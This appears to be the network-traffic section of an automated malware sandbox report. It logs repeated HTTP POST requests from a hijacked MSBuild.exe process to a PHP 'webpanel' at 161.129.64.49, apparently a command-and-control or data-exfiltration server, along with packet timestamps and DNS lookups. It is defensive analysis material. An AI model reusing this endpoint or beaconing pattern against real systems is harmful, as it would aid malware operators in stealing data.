                                          Sep 15, 2021 14:13:15.699462891 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:15.699865103 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:15.764553070 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:15.765258074 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:15.779208899 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:15.792324066 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:15.792733908 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:15.873573065 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:16.886945963 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:16.887478113 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:16.913275003 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:16.913697958 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:16.997631073 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:17.130023003 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:17.130760908 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:17.159096003 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:17.159945011 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:17.232557058 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:17.886820078 CEST4967580192.168.2.523.203.69.124
                                          Sep 15, 2021 14:13:17.905529022 CEST804967523.203.69.124192.168.2.5
                                          Sep 15, 2021 14:13:17.905612946 CEST4967580192.168.2.523.203.69.124
                                          Sep 15, 2021 14:13:18.272187948 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:18.272989988 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:18.298352003 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:18.298707008 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:18.315689087 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:18.316448927 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:18.343164921 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:18.343503952 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:18.373951912 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:18.435291052 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:19.152745008 CEST4968180192.168.2.523.55.161.167
                                          Sep 15, 2021 14:13:19.171395063 CEST804968123.55.161.167192.168.2.5
                                          Sep 15, 2021 14:13:19.171478987 CEST4968180192.168.2.523.55.161.167
                                          Sep 15, 2021 14:13:19.667202950 CEST8049740161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:19.667951107 CEST4974080192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:19.670584917 CEST8049739161.129.64.49192.168.2.5
                                          Sep 15, 2021 14:13:19.671797991 CEST4973980192.168.2.5161.129.64.49
                                          Sep 15, 2021 14:13:19.693490982 CEST8049740161.129.64.49192.168.2.5

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 15, 2021 14:12:29.302016973 CEST6180553192.168.2.58.8.8.8
                                          Sep 15, 2021 14:12:29.334316015 CEST53618058.8.8.8192.168.2.5
                                          Sep 15, 2021 14:12:43.383393049 CEST5479553192.168.2.58.8.8.8
                                          Sep 15, 2021 14:12:43.417336941 CEST53547958.8.8.8192.168.2.5
                                          Sep 15, 2021 14:13:01.144943953 CEST4955753192.168.2.58.8.8.8
                                          Sep 15, 2021 14:13:01.169748068 CEST53495578.8.8.8192.168.2.5
                                          Sep 15, 2021 14:13:19.594683886 CEST6173353192.168.2.58.8.8.8
                                          Sep 15, 2021 14:13:19.621222973 CEST53617338.8.8.8192.168.2.5
                                          Sep 15, 2021 14:13:21.404922009 CEST6544753192.168.2.58.8.8.8
                                          Sep 15, 2021 14:13:21.440296888 CEST53654478.8.8.8192.168.2.5
                                          Sep 15, 2021 14:13:36.197587013 CEST5244153192.168.2.58.8.8.8
                                          Sep 15, 2021 14:13:36.243068933 CEST53524418.8.8.8192.168.2.5
                                          Sep 15, 2021 14:13:38.586544991 CEST6217653192.168.2.58.8.8.8
                                          Sep 15, 2021 14:13:38.618644953 CEST53621768.8.8.8192.168.2.5
                                          Sep 15, 2021 14:14:12.888977051 CEST5959653192.168.2.58.8.8.8
                                          Sep 15, 2021 14:14:12.926632881 CEST53595968.8.8.8192.168.2.5
                                          Sep 15, 2021 14:14:14.882390022 CEST6529653192.168.2.58.8.8.8
                                          Sep 15, 2021 14:14:14.925168037 CEST53652968.8.8.8192.168.2.5

                                          HTTP Request Dependency Graph

                                          • 161.129.64.49

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.549739161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:13:10.463701010 CEST1056OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 458
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 15, 2021 14:13:10.489706039 CEST1056INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:12.638597012 CEST1057INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:10 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:12.908216000 CEST1057OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:12.935074091 CEST1057INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:14.298929930 CEST1059INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:12 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:14.299721956 CEST1060OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:14.324831009 CEST1060INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:15.673455954 CEST1062INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:14 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:15.674104929 CEST1062OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:15.699462891 CEST1062INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:16.886945963 CEST1064INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:15 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:16.887478113 CEST1064OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:16.913275003 CEST1065INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:18.272187948 CEST1067INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:16 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:18.272989988 CEST1067OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:18.298352003 CEST1067INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:19.670584917 CEST1071INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:18 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:19.671797991 CEST1071OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:19.696696043 CEST1072INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:20.860246897 CEST1073INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:19 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:20.860774040 CEST1073OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:20.885922909 CEST1073INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:22.219360113 CEST1091INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:20 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:22.220195055 CEST1092OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 458
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:22.245150089 CEST1092INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:23.567517996 CEST1110INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:22 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.549740161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:13:13.256377935 CEST1058OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:13.281702995 CEST1058INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:14.418926001 CEST1060INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:13 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:14.419704914 CEST1061OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:14.446351051 CEST1061INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:15.764553070 CEST1063INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:14 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:15.765258074 CEST1063OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:15.792324066 CEST1063INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:17.130023003 CEST1065INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:15 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:17.130760908 CEST1066OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:17.159096003 CEST1066INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:18.315689087 CEST1068INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:17 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:18.316448927 CEST1068OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:18.343164921 CEST1068INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:19.667202950 CEST1070INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:18 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:19.667951107 CEST1070OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:19.693490982 CEST1071INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:21.047297955 CEST1074INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:19 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:21.052356958 CEST1075OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 458
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:21.078917980 CEST1075INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:22.238352060 CEST1092INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:21 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:22.239392996 CEST1092OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:22.265947104 CEST1094INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:23.644733906 CEST1111INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:22 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          10192.168.2.549786161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:13:58.111722946 CEST4899OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 458
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:58.136925936 CEST4899INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:59.488430977 CEST4900INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:58 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          11192.168.2.549787161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:14:02.827258110 CEST4903OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:14:02.854156017 CEST4903INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:14:04.210328102 CEST4905INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:14:02 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          12192.168.2.549788161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:14:07.625634909 CEST4908OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:14:07.650738955 CEST4908INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:14:09.005623102 CEST4909INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:14:07 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          13192.168.2.549789161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:14:12.550192118 CEST4913OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 460
                                          Expect: 100-continue
                                          Sep 15, 2021 14:14:12.576733112 CEST4913INHTTP/1.1 100 Continue


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          14192.168.2.549794161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          15192.168.2.549795161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          16192.168.2.549796161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          17192.168.2.549797161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          18192.168.2.549798161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.549754161.129.64.4980C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 15, 2021 14:13:23.440706968 CEST1106OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:23.467696905 CEST1108INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:24.618895054 CEST1121INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:23 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:24.619465113 CEST1121OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 458
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:24.646886110 CEST1122INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:26.193864107 CEST1134INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:24 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:26.351502895 CEST1135OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:26.377167940 CEST1136INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:27.724220991 CEST1143INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:26 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:27.978575945 CEST1144OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:28.003465891 CEST1144INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:29.139285088 CEST1152INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:28 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:29.140022993 CEST1152OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:29.164916992 CEST1152INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:30.554441929 CEST1154INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:29 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
                                          Sep 15, 2021 14:13:30.555670023 CEST1154OUTPOST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
                                          Content-Type: application/x-www-form-urlencoded
                                          Host: 161.129.64.49
                                          Content-Length: 456
                                          Expect: 100-continue
                                          Sep 15, 2021 14:13:30.580851078 CEST1154INHTTP/1.1 100 Continue
                                          Sep 15, 2021 14:13:31.727874041 CEST1156INHTTP/1.1 200 OK
                                          Date: Wed, 15 Sep 2021 12:13:30 GMT
                                          Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                          X-Powered-By: PHP/7.1.33
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8
